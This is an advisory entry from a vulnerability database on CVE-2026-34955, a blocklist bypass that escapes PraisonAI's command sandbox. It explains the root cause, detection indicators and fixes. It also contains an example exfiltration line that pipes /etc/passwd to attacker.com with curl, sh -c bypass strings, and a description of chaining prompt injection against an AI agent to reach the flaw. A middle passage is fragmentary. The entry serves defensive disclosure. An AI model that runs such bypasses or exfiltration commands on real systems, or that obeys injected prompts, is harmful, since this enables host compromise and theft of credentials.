
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34955 is a sandbox escape vulnerability in PraisonAI's SubprocessSandbox component, allowing OS command injection by bypassing an incomplete command blocklist. It affects all SubprocessSandbox modes (BASIC, STRICT, NETWORK_ISOLATED) in PraisonAI versions up to and including 4.5.96. The vulnerability was published on March 31, 2026, by the maintainer and added to the GitHub Advisory Database on April 1, 2026. The GitHub Advisory assigns a CVSS v3.1 score of 8.8 (High) with a local attack vector, while Feedly's threat intelligence estimates a score of 10.0 (Critical) with a network attack vector, reflecting differing assessments of reachability (GitHub Advisory, PraisonAI Advisory).
The root cause (CWE-78: OS Command Injection) lies in sandbox_executor.py, where SubprocessSandbox.execute() passes user-supplied commands to subprocess.run() with shell=True (line 326), meaning the underlying shell (/bin/sh) is always invoked regardless of the configured sandbox mode. The blocklist check at line 179 extracts the first token of the command and compares it against a set of blocked command names, but sh and bash are absent from this list. Additionally, the dangerous pattern checks for pipe-based shell invocations (e.g., | sh) require a leading space, meaning id|bash evades detection. An attacker can trivially bypass all sandbox restrictions by prefixing any blocked command with sh -c '...', as demonstrated in the public PoC (GitHub Advisory, PraisonAI Advisory).
Successful exploitation renders the --sandbox strict mode entirely ineffective, giving an attacker unrestricted access to the OS as the process user. Commands blocked by policy — including curl, wget, nc, and ssh — become trivially reachable, enabling network egress, filesystem access, and queries to cloud metadata services (e.g., AWS IMDSv1). When combined with agent prompt injection, a remote attacker can chain this vulnerability to achieve full host compromise, lateral movement within cloud environments, and exfiltration of secrets or credentials (GitHub Advisory, PraisonAI Advisory).
A public proof-of-concept (PoC) exploit is available in the GitHub Security Advisory, consisting of a short, self-contained Python script that directly instantiates SubprocessSandbox in STRICT mode and executes sh -c 'id' to demonstrate the escape (PraisonAI Advisory). As of the time of reporting, there is no confirmed evidence of in-the-wild exploitation or threat actor attribution. The EPSS score is approximately 0.02% (5th percentile), indicating a currently low probability of active exploitation within 30 days. The vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).
--sandbox strict). This may be exposed via an agent API endpoint or accessible through prompt injection in an AI agent workflow.sh or bash as the top-level executable, which is absent from the blocklist. For example: sh -c 'curl http://attacker.com/exfil?data=$(cat /etc/passwd)'.SubprocessSandbox.execute() method — either directly via API, or indirectly by injecting a malicious prompt into an agent that causes it to invoke the sandbox with attacker-controlled input.subprocess.run() is called with shell=True, the system shell (/bin/sh) interprets the full command string. The blocklist check passes since sh is not blocked, and the shell executes the inner command without restriction.http://169.254.169.254/latest/meta-data/), or pivot to other services reachable from the host (GitHub Advisory, PraisonAI Advisory).sh, bash, curl, wget, nc, or ssh; processes executing commands like id, whoami, or uname from within the agent runtime.169.254.169.254) originating from the agent process; DNS lookups for attacker-controlled domains.SubprocessSandbox.execute() calls with arguments beginning with sh -c or bash -c; absence of SecurityError exceptions despite policy-restricted commands being executed./tmp by the agent process; unexpected cron jobs, SSH authorized keys, or scripts created under the service account's home directory.Upgrade PraisonAI to version 4.5.97 or later, which patches this vulnerability (GitHub Advisory). The recommended code-level fix is to replace subprocess.run(command, shell=True, ...) with subprocess.run(shlex.split(command), shell=False, ...), which prevents shell interpretation and eliminates the bypass vector. As an interim workaround, add sh and bash to the blocked_commands list and switch from a blocklist to an allowlist approach for permitted commands. Additionally, consider deploying OS-level sandboxing (e.g., seccomp, namespaces, or containers) as a defense-in-depth measure independent of the application-layer sandbox (PraisonAI Advisory).
The vulnerability was reported by security researcher YeranG30 and disclosed responsibly through GitHub's security advisory process (GitHub Advisory). The Hacker Wire published a dedicated write-up on the sandbox escape (The Hacker Wire), and a broader community post on dev.to discussed CVE-2026-34955 as part of a series of seven CVEs discovered in PraisonAI within 48 hours, highlighting systemic security weaknesses in AI agent frameworks. The vulnerability was also discussed on Reddit's r/pwnhub and shared on Mastodon and Bluesky, generating moderate community attention given its critical-severity potential when combined with prompt injection.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."